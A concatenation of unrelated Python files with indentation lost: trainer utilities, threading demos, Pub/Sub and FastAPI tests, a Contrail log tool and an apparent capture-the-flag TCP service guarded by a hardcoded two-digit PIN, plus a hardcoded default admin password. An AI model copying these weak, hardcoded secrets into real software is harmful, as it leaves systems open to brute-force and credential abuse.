# Remove speed metrics
speed_metrics = [m for m in metrics.keys() if m.endswith("_runtime") or m.endswith("_samples_per_second")]
for sm in speed_metrics:
_ = metrics.pop(sm, None)
return loss if len(metrics) == 0 else sum(metrics.values())
def default_hp_space_optuna(trial) -> Dict[str, float]:
from .integrations import is_optuna_available
assert is_optuna_available(), "This function needs Optuna installed: `pip install optuna`"
return {
"learning_rate": trial.suggest_float("learning_rate", 1e-6, 1e-4, log=True),
"num_train_epochs": trial.suggest_int("num_train_epochs", 1, 5),
"seed": trial.suggest_int("seed", 1, 40),
"per_device_train_batch_size": trial.suggest_categorical("per_device_train_batch_size", [4, 8, 16, 32, 64]),
}
def default_hp_space_ray(trial) -> Dict[str, float]:
from .integrations import is_ray_tune_available
assert is_ray_tune_available(), "This function needs ray installed: `pip " "install ray[tune]`"
from ray import tune
return {
"learning_rate": tune.loguniform(1e-6, 1e-4),
"num_train_epochs": tune.choice(list(range(1, 6))),
"seed": tune.uniform(1, 40),
"per_device_train_batch_size": tune.choice([4, 8, 16, 32, 64]),
}
class HPSearchBackend(ExplicitEnum):
OPTUNA = "optuna"
RAY = "ray"
default_hp_space = {
HPSearchBackend.OPTUNA: default_hp_space_optuna,
HPSearchBackend.RAY: default_hp_space_ray,
}
def is_main_process(local_rank):
"""
Whether or not the current process is the local process, based on `xm.get_ordinal()` (for TPUs) first, then on
`local_rank`.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.get_ordinal() == 0
return local_rank in [-1, 0]
def total_processes_number(local_rank):
"""
Return the number of processes launched in parallel. Works with `torch.distributed` and TPUs.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.xrt_world_size()
elif is_sagemaker_dp_enabled():
import smdistributed.dataparallel.torch.distributed as dist
return dist.get_world_size()
elif local_rank != -1 and is_torch_available():
import torch
return torch.distributed.get_world_size()
return 1
def speed_metrics(split, start_time, num_samples=None):
"""
Measure and return speed performance metrics.
This function requires a time snapshot `start_time` before the operation to be measured starts and this function
should be run immediately after the operation to be measured has completed.
Args:
- split: name to prefix metric (like train, eval, test...)
- start_time: operation start time
- num_samples: number of samples processed
"""
runtime = time.time() - start_time
result = {f"{split}_runtime": round(runtime, 4)}
if num_samples is not None:
samples_per_second = 1 / (runtime / num_samples)
result[f"{split}_samples_per_second"] = round(samples_per_second, 3)
return result
class SchedulerType(ExplicitEnum):
LINEAR = "linear"
COSINE = "cosine"
COSINE_WITH_RESTARTS = "cosine_with_restarts"
POLYNOMIAL = "polynomial"
CONSTANT = "constant"
CONSTANT_WITH_WARMUP = "constant_with_warmup"
class TrainerMemoryTracker:
"""
A helper class that tracks cpu and gpu memory.
This class will silently skip unless ``psutil`` is available. Install with ``pip install psutil``.
When a stage completes, it can pass metrics dict to update with the memory metrics gathered during this stage.
Example ::
self._memory_tracker = TrainerMemoryTracker(self.args.skip_memory_metrics)
self._memory_tracker.start()
code ...
metrics = {"train_runtime": 10.5}
self._memory_tracker.stop_and_update_metrics(metrics)
At the moment GPU tracking is only for ``pytorch``, but can be extended to support ``tensorflow``.
To understand this class' intricacies please read the documentation of :meth:`~transformers.Trainer.log_metrics`.
"""
# map trainer methods to metrics prefix
stages = {
"__init__": "init",
"train": "train",
"evaluate": "eval",
"predict": "test",
}
def __init__(self, skip_memory_metrics=False):
self.skip_memory_metrics = skip_memory_metrics
if not is_psutil_available():
# soft dependency on psutil
self.skip_memory_metrics = True
if self.skip_memory_metrics:
return
import psutil # noqa
if is_torch_cuda_available():
import torch
self.torch = torch
self.gpu = {}
else:
self.torch = None
self.process = psutil.Process()
self.cur_stage = None
self.cpu = {}
self.init_reported = False
def derive_stage(self):
""" derives the stage/caller name automatically """
caller = inspect.currentframe().f_back.f_back.f_code.co_name
if caller in self.stages:
return self.stages[caller]
else:
raise ValueError(
f"was called from {caller}, but only expect to be called from one of {self.stages.keys()}"
)
def cpu_mem_used(self):
""" get resident set size memory for the current process """
return self.process.memory_info().rss
def peak_monitor_func(self):
self.cpu_mem_used_peak = -1
while True:
self.cpu_mem_used_peak = max(self.cpu_mem_used(), self.cpu_mem_used_peak)
# can't sleep or will not catch the peak right (this comment is here on purpose)
# time.sleep(0.001) # 1msec
if not self.peak_monitoring:
break
def start(self):
""" start tracking for the caller's stage """
if self.skip_memory_metrics:
return
stage = self.derive_stage()
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
self.cur_stage = stage
gc.collect()
if self.torch is not None:
self.torch.cuda.reset_peak_memory_stats()
self.torch.cuda.empty_cache()
# gpu
if self.torch is not None:
self.gpu_mem_used_at_start = self.torch.cuda.memory_allocated()
# cpu
self.cpu_mem_used_at_start = self.cpu_mem_used()
self.peak_monitoring = True
peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
peak_monitor_thread.daemon = True
peak_monitor_thread.start()
def stop(self, stage):
""" stop tracking for the passed stage """
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# this sends a signal to peak_monitor_func to complete its loop
self.peak_monitoring = False
# first ensure all objects get collected and their memory is freed
gc.collect()
if self.torch is not None:
self.torch.cuda.empty_cache()
# concepts:
# - alloc_delta: the difference of allocated memory between the end and the start
# - peaked_delta: the difference between the peak memory and the current memory
# in order to know how much memory the measured code consumed one needs to sum these two
# gpu
if self.torch is not None:
self.gpu_mem_used_now = self.torch.cuda.memory_allocated()
self.gpu_mem_used_peak = self.torch.cuda.max_memory_allocated()
self.gpu[self.cur_stage] = dict(
alloc=(self.gpu_mem_used_now - self.gpu_mem_used_at_start),
peaked=max(0, self.gpu_mem_used_peak - self.gpu_mem_used_now),
)
# cpu
self.cpu_mem_used_now = self.cpu_mem_used()
self.cpu[self.cur_stage] = dict(
alloc=(self.cpu_mem_used_now - self.cpu_mem_used_at_start),
peaked=max(0, self.cpu_mem_used_peak - self.cpu_mem_used_now),
)
# reset - cycle finished
self.cur_stage = None
def update_metrics(self, stage, metrics):
""" stop tracking for the passed stage """
if self.skip_memory_metrics:
return
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# since we don't have a way to return init metrics, we push them into the first of train/val/predict
stages = [stage]
if not self.init_reported:
stages.insert(0, "init")
self.init_reported = True
for stage in stages:
for t in ["alloc", "peaked"]:
if stage in self.cpu and t in self.cpu[stage]:
metrics[f"{stage}_mem_cpu_{t}_delta"] = self.cpu[stage][t]
if self.torch is not None and stage in self.gpu and t in self.gpu[stage]:
metrics[f"{stage}_mem_gpu_{t}_delta"] = self.gpu[stage][t]
def stop_and_update_metrics(self, metrics=None):
""" combine stop + update in one call for simpler code """
if self.skip_memory_metrics:
return
stage = self.derive_stage()
self.stop(stage)
# init doesn't have metrics to update so we just save that data for later stages to retrieve
if metrics is not None:
self.update_metrics(stage, metrics)
def denumpify_detensorize(metrics):
"""
Recursively calls `.item()` on the element of the dictionary passed
"""
if isinstance(metrics, (list, tuple)):
return type(metrics)(denumpify_detensorize(m) for m in metrics)
elif isinstance(metrics, dict):
return type(metrics)({k: denumpify_detensorize(v) for k, v in metrics.items()})
elif isinstance(metrics, np.generic):
return metrics.item()
elif is_torch_available() and isinstance(metrics, torch.Tensor) and metrics.numel() == 1:
return metrics.item()
return metrics
class ShardedDDPOption(ExplicitEnum):
SIMPLE = "simple"
ZERO_DP_2 = "zero_dp_2"
ZERO_DP_3 = "zero_dp_3"
OFFLOAD = "offload"
AUTO_WRAP = "auto_wrap"
|
thread_name.py
|
import threading
import time
def myThread():
print(f'Thread {threading.current_thread().name} started')
time.sleep(5)
print(f'Thread {threading.current_thread().name} finished')
for i in range(4):
threadName = 'Thread-' + str(i)
thread = threading.Thread(name=threadName, target=myThread)
thread.start()
print(f'{threading.enumerate()}')
'''
Thread Thread-0 started
Thread Thread-1 started
Thread Thread-2 started
Thread Thread-3 started
[
<_MainThread(MainThread, started 4593550784)>,
<Thread(Thread-0, started 123145357635584)>,
<Thread(Thread-1, started 123145374425088)>,
<Thread(Thread-2, started 123145391214592)>,
<Thread(Thread-3, started 123145408004096)>
]
Thread Thread-0 finished
Thread Thread-1 finished
Thread Thread-3 finished
Thread Thread-2 finished
'''
|
test_consumer.py
|
# Copyright 2017, Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import types as base_types
from google.auth import credentials
import mock
import pytest
from six.moves import queue
from google.cloud.pubsub_v1 import subscriber
from google.cloud.pubsub_v1 import types
from google.cloud.pubsub_v1.subscriber import _consumer
from google.cloud.pubsub_v1.subscriber import _helper_threads
from google.cloud.pubsub_v1.subscriber.policy import thread
def test_send_request():
consumer = _consumer.Consumer()
request = types.StreamingPullRequest(subscription='foo')
with mock.patch.object(queue.Queue, 'put') as put:
consumer.send_request(request)
put.assert_called_once_with(request)
def test_request_generator_thread():
consumer = _consumer.Consumer()
creds = mock.Mock(spec=credentials.Credentials)
client = subscriber.Client(credentials=creds)
policy = client.subscribe('sub_name_e')
generator = consumer._request_generator_thread(policy)
# The first request that comes from the request generator thread
# should always be the initial request.
initial_request = next(generator)
assert initial_request.subscription == 'sub_name_e'
assert initial_request.stream_ack_deadline_seconds == 10
# Subsequent requests correspond to items placed in the request queue.
consumer.send_request(types.StreamingPullRequest(ack_ids=['i']))
request = next(generator)
assert request.ack_ids == ['i']
# The poison pill should stop the loop.
consumer.send_request(_helper_threads.STOP)
with pytest.raises(StopIteration):
next(generator)
def test_blocking_consume():
policy = mock.Mock(spec=('call_rpc', 'on_response'))
policy.call_rpc.return_value = iter((mock.sentinel.A, mock.sentinel.B))
consumer = _consumer.Consumer()
consumer.resume()
assert consumer._blocking_consume(policy) is None
policy.call_rpc.assert_called_once()
policy.on_response.assert_has_calls(
[mock.call(mock.sentinel.A), mock.call(mock.sentinel.B)])
@mock.patch.object(_consumer, '_LOGGER')
def test_blocking_consume_when_exiting(_LOGGER):
consumer = _consumer.Consumer()
assert consumer._stopped.is_set() is False
consumer._stopped.set()
# Make sure method cleanly exits.
assert consumer._blocking_consume(None) is None
_LOGGER.debug.assert_called_once_with('Event signaled consumer exit.')
class OnException(object):
def __init__(self, acceptable=None):
self.acceptable = acceptable
def __call__(self, exception):
if exception is self.acceptable:
return True
else:
return False
def test_blocking_consume_on_exception():
policy = mock.Mock(spec=('call_rpc', 'on_response', 'on_exception'))
policy.call_rpc.return_value = iter((mock.sentinel.A, mock.sentinel.B))
exc = TypeError('Bad things!')
policy.on_response.side_effect = exc
consumer = _consumer.Consumer()
consumer.resume()
consumer._consumer_thread = mock.Mock(spec=threading.Thread)
policy.on_exception.side_effect = OnException()
# Establish that we get responses until we are sent the exiting event.
consumer._blocking_consume(policy)
assert consumer._consumer_thread is None
# Check mocks.
policy.call_rpc.assert_called_once()
policy.on_response.assert_called_once_with(mock.sentinel.A)
policy.on_exception.assert_called_once_with(exc)
class RaisingResponseGenerator(object):
# NOTE: This is needed because defining `.next` on an **instance**
# rather than the **class** will not be iterable in Python 2.
# This is problematic since a `Mock` just sets members.
def __init__(self, exception):
self.exception = exception
self.done_calls = 0
self.next_calls = 0
def done(self):
self.done_calls += 1
return True
def __next__(self):
self.next_calls += 1
raise self.exception
def next(self):
return self.__next__() # Python 2
def test_blocking_consume_two_exceptions():
policy = mock.Mock(spec=('call_rpc', 'on_exception'))
exc1 = NameError('Oh noes.')
exc2 = ValueError('Something grumble.')
policy.on_exception.side_effect = OnException(acceptable=exc1)
response_generator1 = RaisingResponseGenerator(exc1)
response_generator2 = RaisingResponseGenerator(exc2)
policy.call_rpc.side_effect = (response_generator1, response_generator2)
consumer = _consumer.Consumer()
consumer.resume()
consumer._consumer_thread = mock.Mock(spec=threading.Thread)
# Establish that we get responses until we are sent the exiting event.
assert consumer._blocking_consume(policy) is None
assert consumer._consumer_thread is None
# Check mocks.
assert policy.call_rpc.call_count == 2
assert response_generator1.next_calls == 1
assert response_generator1.done_calls == 1
assert response_generator2.next_calls == 1
assert response_generator2.done_calls == 0
policy.on_exception.assert_has_calls(
[mock.call(exc1), mock.call(exc2)])
def test_paused():
consumer = _consumer.Consumer()
assert consumer.paused is True
consumer._can_consume.set()
assert consumer.paused is False
consumer._can_consume.clear()
assert consumer.paused is True
@mock.patch.object(_consumer, '_LOGGER')
def test_pause(_LOGGER):
consumer = _consumer.Consumer()
consumer._can_consume.set()
assert consumer.pause() is None
assert not consumer._can_consume.is_set()
_LOGGER.debug.assert_called_once_with('Pausing consumer')
@mock.patch.object(_consumer, '_LOGGER')
def test_resume(_LOGGER):
consumer = _consumer.Consumer()
consumer._can_consume.clear()
assert consumer.resume() is None
assert consumer._can_consume.is_set()
_LOGGER.debug.assert_called_once_with('Resuming consumer')
def test_start_consuming():
creds = mock.Mock(spec=credentials.Credentials)
client = subscriber.Client(credentials=creds)
policy = client.subscribe('sub_name_e')
consumer = _consumer.Consumer()
with mock.patch.object(threading, 'Thread', autospec=True) as Thread:
consumer.start_consuming(policy)
assert consumer._stopped.is_set() is False
Thread.assert_called_once_with(
name=_consumer._BIDIRECTIONAL_CONSUMER_NAME,
target=consumer._blocking_consume,
args=(policy,),
)
assert consumer._consumer_thread is Thread.return_value
def test_stop_consuming():
consumer = _consumer.Consumer()
assert consumer._stopped.is_set() is False
thread = mock.Mock(spec=threading.Thread)
consumer._consumer_thread = thread
assert consumer.stop_consuming() is None
# Make sure state was updated.
assert consumer._stopped.is_set() is True
assert consumer._consumer_thread is None
# Check mocks.
thread.join.assert_called_once_with()
def basic_queue_generator(queue, received):
while True:
value = queue.get()
received.put(value)
yield value
def test_stop_request_generator_response_not_done():
consumer = _consumer.Consumer()
response_generator = mock.Mock(spec=('done',))
response_generator.done.return_value = False
stopped = consumer._stop_request_generator(None, response_generator)
assert stopped is False
# Check mocks.
response_generator.done.assert_called_once_with()
def test_stop_request_generator_not_running():
# Model scenario tested:
# - The request generator **is not** running
# - The request queue **is not** empty
# Expected result:
# - ``_stop_request_generator()`` successfully calls ``.close()``
consumer = _consumer.Consumer()
queue_ = consumer._request_queue
received = queue.Queue()
request_generator = basic_queue_generator(queue_, received)
item1 = 'unblock-please'
item2 = 'still-here'
queue_.put(item1)
queue_.put(item2)
assert not queue_.empty()
assert received.empty()
thread = threading.Thread(target=next, args=(request_generator,))
thread.start()
# Make sure the generator is not stuck at the blocked ``.get()``
# in the thread.
while request_generator.gi_running:
pass
assert received.get() == item1
# Make sure it **isn't** done.
assert request_generator.gi_frame is not None
response_generator = mock.Mock(spec=('done',))
response_generator.done.return_value = True
stopped = consumer._stop_request_generator(
request_generator, response_generator)
assert stopped is True
# Make sure it **is** done.
assert not request_generator.gi_running
assert request_generator.gi_frame is None
assert not queue_.empty()
assert queue_.get() == item2
assert queue_.empty()
# Check mocks.
response_generator.done.assert_called_once_with()
def test_stop_request_generator_close_failure():
# Model scenario tested:
# - The input isn't actually a generator
# Expected result:
# - ``_stop_request_generator()`` falls through to the ``LOGGER.error``
# case and returns ``False``
consumer = _consumer.Consumer()
request_generator = mock.Mock(spec=('close',))
request_generator.close.side_effect = TypeError('Really, not a generator')
response_generator = mock.Mock(spec=('done',))
response_generator.done.return_value = True
stopped = consumer._stop_request_generator(
request_generator, response_generator)
assert stopped is False
# Make sure close() was only called once.
request_generator.close.assert_called_once_with()
response_generator.done.assert_called_once_with()
def test_stop_request_generator_queue_non_empty():
# Model scenario tested:
# - The request generator **is** running
# - The request queue **is not** empty
# Expected result:
# - ``_stop_request_generator()`` can't call ``.close()`` (since
# the generator is running) but then returns with ``False`` because
# the queue **is not** empty
consumer = _consumer.Consumer()
# Attach a "fake" queue to the request generator so the generator can
# block on an empty queue while the consumer's queue is not empty.
queue_ = queue.Queue()
received = queue.Queue()
request_generator = basic_queue_generator(queue_, received)
# Make sure the consumer's queue is not empty.
item1 = 'not-empty'
consumer._request_queue.put(item1)
thread = threading.Thread(target=next, args=(request_generator,))
thread.start()
# Make sure the generator is stuck at the blocked ``.get()``
# in ``thread``.
while not request_generator.gi_running:
pass
assert received.empty()
assert request_generator.gi_frame is not None
response_generator = mock.Mock(spec=('done',))
response_generator.done.return_value = True
stopped = consumer._stop_request_generator(
request_generator, response_generator)
assert stopped is False
# Make sure the generator is **still** not finished.
assert request_generator.gi_running
assert request_generator.gi_frame is not None
assert consumer._request_queue.get() == item1
# Allow the generator to exit.
item2 = 'just-exit'
queue_.put(item2)
# Wait until it's actually done.
while request_generator.gi_running:
pass
assert received.get() == item2
# Check mocks.
response_generator.done.assert_called_once_with()
def test_stop_request_generator_running():
# Model scenario tested:
# - The request generator **is** running
# - The request queue **is** empty
# Expected result:
# - ``_stop_request_generator()`` can't call ``.close()`` (since
# the generator is running) but then verifies that the queue is
# empty and sends ``STOP`` into the queue to successfully stop
# the generator
consumer = _consumer.Consumer()
queue_ = consumer._request_queue
received = queue.Queue()
request_generator = basic_queue_generator(queue_, received)
thread = threading.Thread(target=next, args=(request_generator,))
thread.start()
# Make sure the generator is stuck at the blocked ``.get()``
# in the thread.
while not request_generator.gi_running:
pass
assert received.empty()
assert request_generator.gi_frame is not None
response_generator = mock.Mock(spec=('done',))
response_generator.done.return_value = True
stopped = consumer._stop_request_generator(
request_generator, response_generator)
assert stopped is True
# Make sure it **is** done, though we may have to wait until
# the generator finishes (it has a few instructions between the
# ``get()`` and the ``break``).
while request_generator.gi_running:
pass
request_generator.close()
assert request_generator.gi_frame is None
assert received.get() == _helper_threads.STOP
assert queue_.empty()
# Check mocks.
response_generator.done.assert_called_once_with()
|
interface_multiprocessing.py
|
from multiprocessing import Process
def setup_multiproceesing(target, data_list):
processes = []
for index, data in enumerate(data_list):
print("make process #{}".format(index))
process = Process(target=target, args=(data,))
processes.append(process)
process.start()
return processes
def start_multiprocessing(processes):
for process in processes:
process.join()
|
thread_event.py
|
#! /usr/bin/env python3
# -*- coding:utf-8 -*-
import threading
import time
# 通过Event来实现两个或多个线程间的交互,下面是一个红绿灯的例子,即起动一个线程做交通指挥灯,生成几个线程做车辆,车辆行驶按红灯停,绿灯行的规则。
def lighter():
count = 0
event.set()
while True:
if 5 < count < 10:
event.clear()
print("This is RED....")
elif count > 10:
event.set()
count = 0
else:
print("This is GREEN...")
time.sleep(1)
count += 1
def car(name):
while True:
if event.is_set():
print(" Green, The %s running...." % name)
time.sleep(1)
else:
print("RED, the %s is waiting..." % name)
event.wait()
print("green, %s start going..." % name)
event = threading.Event()
light = threading.Thread(target=lighter, )
light.start()
car1 = threading.Thread(target=car, args=("Tesla",))
car1.start()
|
server_with_remote_id_test.py
|
import os
import sys
import pytest
import uvicorn
import asyncio
import requests
from fastapi import FastAPI
from multiprocessing import Process
from fastapi_websocket_rpc.utils import gen_uid
from fastapi_websocket_rpc.logger import get_logger
from fastapi_websocket_rpc.rpc_channel import RpcChannel
# Add parent path to use local src as package for tests
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))
)
from fastapi_websocket_pubsub import PubSubEndpoint, PubSubClient
from fastapi_websocket_pubsub.event_notifier import ALL_TOPICS
logger = get_logger("Test")
# Configurable
PORT = int(os.environ.get("PORT") or "7990")
uri = f"ws://localhost:{PORT}/pubsub"
trigger_url = f"http://localhost:{PORT}/trigger"
ask_remote_id_url = f"http://localhost:{PORT}/ask-remote-id"
DATA = "MAGIC"
EVENT_TOPIC = "event/has-happened"
REMOTE_ID_ANSWER_TOPIC = "client/my-remote-id"
def setup_server_rest_routes(
app, endpoint: PubSubEndpoint, remote_id_event: asyncio.Event
):
@app.get("/trigger")
async def trigger_events():
logger.info("Triggered via HTTP route - publishing event")
# Publish an event named 'steel'
# Since we are calling back (RPC) to the client- this would deadlock if we wait on it
asyncio.create_task(endpoint.publish([EVENT_TOPIC], data=DATA))
return "triggered"
@app.get("/ask-remote-id")
async def trigger_events():
logger.info("Got asked if i have the remote id")
answer = "yes" if remote_id_event.is_set() else "no"
asyncio.create_task(
endpoint.publish([REMOTE_ID_ANSWER_TOPIC], {"answer": answer})
)
return {"answer": answer}
def setup_server():
app = FastAPI()
remote_id_ok = asyncio.Event()
async def try_to_get_remote_id(channel: RpcChannel):
logger.info(f"trying to get remote channel id")
channel_other_channel_id = await channel.get_other_channel_id()
logger.info(f"finished getting remote channel id")
if channel_other_channel_id is not None:
remote_id_ok.set()
logger.info(f"remote channel id: {channel_other_channel_id}")
logger.info(f"local channel id: {channel_other_channel_id}")
async def on_connect(channel: RpcChannel):
logger.info(f"Connected to remote channel")
asyncio.create_task(try_to_get_remote_id(channel))
# PubSub websocket endpoint - setting up the server with remote id
endpoint = PubSubEndpoint(rpc_channel_get_remote_id=True, on_connect=[on_connect])
endpoint.register_route(app, path="/pubsub")
# Regular REST endpoint - that publishes to PubSub
setup_server_rest_routes(app, endpoint, remote_id_ok)
uvicorn.run(app, port=PORT)
@pytest.fixture()
def server():
# Run the server as a separate process
proc = Process(target=setup_server, args=(), daemon=True)
proc.start()
yield proc
proc.kill() # Cleanup after test
@pytest.mark.asyncio
async def test_subscribe_http_trigger_with_remote_id_on(server):
"""
same as the basic_test::test_subscribe_http_trigger, but this time makes sure that
the rpc_channel_get_remote_id doesn't break anything.
"""
# finish trigger
finish = asyncio.Event()
# Create a client and subscribe to topics
async with PubSubClient() as client:
async def on_event(data, topic):
assert data == DATA
finish.set()
# subscribe for the event
client.subscribe(EVENT_TOPIC, on_event)
# start listentining
client.start_client(uri)
# wait for the client to be ready to receive events
await client.wait_until_ready()
# trigger the server via an HTTP route
requests.get(trigger_url)
# wait for finish trigger
await asyncio.wait_for(finish.wait(), 5)
@pytest.mark.asyncio
async def test_pub_sub_with_remote_id_on(server):
"""
same as the basic_test::test_pubsub, but this time makes sure that
the rpc_channel_get_remote_id doesn't break anything.
"""
# finish trigger
finish = asyncio.Event()
# Create a client and subscribe to topics
async with PubSubClient() as client:
async def on_event(data, topic):
assert data == DATA
finish.set()
# subscribe for the event
client.subscribe(EVENT_TOPIC, on_event)
# start listentining
client.start_client(uri)
# wait for the client to be ready to receive events
await client.wait_until_ready()
# publish events (with sync=False toa void deadlocks waiting on the publish to ourselves)
published = await client.publish(
[EVENT_TOPIC], data=DATA, sync=False, notifier_id=gen_uid()
)
assert published.result
# wait for finish trigger
await asyncio.wait_for(finish.wait(), 5)
@pytest.mark.asyncio
async def test_pub_sub_with_all_topics_with_remote_id_on(server):
"""
same as the basic_test::test_pub_sub_with_all_topics, but this time makes sure that
the rpc_channel_get_remote_id doesn't break anything.
"""
# finish trigger
finish = asyncio.Event()
# Create a client and subscribe to topics
async with PubSubClient() as client:
async def on_event(data, topic):
assert data == DATA
finish.set()
# subscribe for the event
client.subscribe(ALL_TOPICS, on_event)
# start listentining
client.start_client(uri)
# wait for the client to be ready to receive events
await client.wait_until_ready()
# publish events (with sync=False toa void deadlocks waiting on the publish to ourselves)
published = await client.publish(
[EVENT_TOPIC], data=DATA, sync=False, notifier_id=gen_uid()
)
assert published.result
# wait for finish trigger
await asyncio.wait_for(finish.wait(), 5)
@pytest.mark.asyncio
async def test_getting_remote_id(server):
"""
tests that the server managed to get the client's channel id successfully.
"""
# finish trigger
finish = asyncio.Event()
remote_id_yes = asyncio.Event()
# Create a client and subscribe to topics
async with PubSubClient() as client:
async def on_event(data, topic):
assert data == DATA
finish.set()
async def on_answer(data, topic):
assert data.get("answer", None) == "yes"
remote_id_yes.set()
# subscribe for the event
client.subscribe(EVENT_TOPIC, on_event)
client.subscribe(REMOTE_ID_ANSWER_TOPIC, on_answer)
# start listentining
client.start_client(uri)
# wait for the client to be ready to receive events
await client.wait_until_ready()
# trigger the server via an HTTP route
requests.get(trigger_url)
# wait for finish trigger
await asyncio.wait_for(finish.wait(), 5)
# sleep so that the server can finish getting the remote id
await asyncio.sleep(1)
# ask the server if he got the remote id
# will trigger the REMOTE_ID_ANSWER_TOPIC topic and the on_answer() callback
requests.get(ask_remote_id_url)
await asyncio.wait_for(remote_id_yes.wait(), 5)
# the client can also try to get it's remote id
# super ugly but it's working:
my_remote_id = await client._rpc_channel._get_other_channel_id()
assert my_remote_id is not None
|
whitney.py
|
#!/usr/bin/env python
# authored by John Hammond
# edited by babysnoop
import SocketServer
import time
import threading
class Service(SocketServer.BaseRequestHandler):
def handle( self ):
print "someone connected!"
entered = self.receive()
entered_a = entered.split(" ")
pin = "77"
if ( entered_a[0].lower() == "iseo" ):
if ( len(entered_a) == 1 ):
self.send( "please supply a command" )
elif ( entered_a[1].lower() == "location" ):
if ( len(entered_a) < 3):
self.send( "please provide the two digit security pin for this information" )
elif ( entered_a[2] != pin ):
self.send( "incorrect two digit security pin" )
else:
self.send( "25N77W" )
elif ( entered_a[1].lower() == "fuel-level" ):
self.send( "33%" )
elif ( entered_a[1].lower() == "hull-condition" ):
self.send( "good" )
else:
self.send( "please choose one of the available commands" )
else:
self.send( "vessel not found\nUsage\n[vessel name] [command] [two digit security pin]\navailabel commands: location, fuel-level, hull-condition" )
def send( self, string, newline = True ):
if newline: string = string + "\n"
self.request.sendall(string)
def receive( self, promt = " > " ):
self.send( promt, newline = False )
return self.request.recv( 4096 ).strip()
class ThreadedService( SocketServer.ThreadingMixIn, SocketServer.TCPServer, SocketServer.DatagramRequestHandler ):
pass
def main():
port = 1337
host = '0.0.0.0'
service = Service
server = ThreadedService( ( host, port ), service )
server.allow_reuse_address = True
server_thread = threading.Thread( target = server.serve_forever )
server_thread.daemon = True
server_thread.start()
print "Server started on port", port
while ( True ): time.sleep(60)
if ( __name__ == "__main__" ):
main()
|
log.py
|
#!/usr/bin/python
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
#
# log
#
# Query log messages from analytics
#
import sys
import ConfigParser
import argparse
import json
import datetime
import logging
import logging.handlers
import time
import re
from multiprocessing import Process
from opserver_util import OpServerUtils
from sandesh_common.vns.ttypes import Module
from sandesh_common.vns.constants import ModuleNames, NodeTypeNames
import sandesh.viz.constants as VizConstants
from pysandesh.gen_py.sandesh.ttypes import SandeshType, SandeshLevel
from pysandesh.sandesh_logger import SandeshLogger
from pysandesh.util import UTCTimestampUsec
import commands
import ast
OBJECT_TYPE_LIST = [table_info.log_query_name for table_info in \
VizConstants._OBJECT_TABLES.values()]
OBJECT_TABLE_MAP = dict((table_info.log_query_name, table_name) for \
(table_name, table_info) in VizConstants._OBJECT_TABLES.items())
output_file_handle = None
class LogQuerier(object):
def __init__(self):
self._args = None
self._slogger = None
# end __init__
def run(self):
try:
if self.parse_args() != 0:
return
if self._args.tail:
start_time = UTCTimestampUsec() - 10*pow(10,6)
while True:
self._start_time = start_time
self._end_time = UTCTimestampUsec()
start_time = self._end_time + 1
time.sleep(3)
result = self.query()
if result == -1:
return
self.display(result)
else:
start_time = self._args.start_time
end_time = self._args.end_time
if not self._args.start_time:
start_time = "now-10m"
if not self._args.end_time:
end_time = "now"
try:
self._start_time, self._end_time = \
OpServerUtils.parse_start_end_time(
start_time = start_time,
end_time = end_time,
last = self._args.last)
except:
return -1
start_time = self._start_time
end_time = self._end_time
result_list = []
while int(end_time) - int(start_time) > 0:
if not self._args.reverse:
self._start_time = start_time
self._end_time = start_time + 10*60*pow(10,6) if (start_time + 10*60*pow(10,6) <= int(end_time)) else int(end_time)
else:
self._end_time = end_time
self._start_time = end_time - 10*60*pow(10,6) if (end_time - 10*60*pow(10,6) >= int(start_time)) else int(start_time)
p = Process(target=self.display, args=(result_list,))
p.start()
result = self.query()
if result == -1:
return
# Accumulate the result before processing it as the
# formatting of result can be cpu intensive and hence would
# affect the overall time taken to fetch the result from the
# analytics-api. Since the query result ttl is set to 5 min
# in redis, it is necessary to improve the read throughput.
result_list = self.read_result(result)
p.join()
if not self._args.reverse:
start_time = self._end_time + 1
else:
end_time = self._start_time - 1
self.display(result_list)
except KeyboardInterrupt:
return
# Public functions
def parse_args(self):
"""
Eg. python log.py --analytics-api-ip 127.0.0.1
--analytics-api-port 8181
--source 127.0.0.1
--node-type Control
--module bgp | cfgm | vnswad
--instance-id 0
--message-type UveVirtualMachineConfigTrace
--category xmpp
--level SYS_INFO | SYS_ERROR
--object-type virtual-network | virtual-machine
--object-id name
--object-select-field ObjectLog | SystemLog
--reverse
--verbose
--raw
--trace BgpPeerTraceBuf
[--start-time now-10m --end-time now] | --last 10m
--send-syslog
--syslog-server 127.0.0.1
--syslog-port 514
--keywords comma,seperated,list
"""
defaults = {
'analytics_api_ip': '127.0.0.1',
'analytics_api_port': '8181',
'admin_user': 'admin',
'admin_password': 'contrail123',
'conf_file': '/etc/contrail/contrail-keystone-auth.conf',
}
conf_parser = argparse.ArgumentParser(add_help=False)
conf_parser.add_argument("--admin-user", help="Name of admin user")
conf_parser.add_argument("--admin-password", help="Password of admin user")
conf_parser.add_argument("--conf-file", help="Configuration file")
conf_parser.add_argument("--analytics-api-ip", help="IP address of Analytics API Server")
conf_parser.add_argument("--analytics-api-port", help="Port of Analytics API Server")
args, remaining_argv = conf_parser.parse_known_args();
configfile = defaults['conf_file']
if args.conf_file:
configfile = args.conf_file
config = ConfigParser.SafeConfigParser()
config.read(configfile)
if 'KEYSTONE' in config.sections():
if args.admin_user == None:
args.admin_user = config.get('KEYSTONE', 'admin_user')
if args.admin_password == None:
args.admin_password = config.get('KEYSTONE','admin_password')
if args.admin_user == None:
args.admin_user = defaults['admin_user']
if args.admin_password == None:
args.admin_password = defaults['admin_password']
if args.analytics_api_ip == None:
args.analytics_api_ip = defaults['analytics_api_ip']
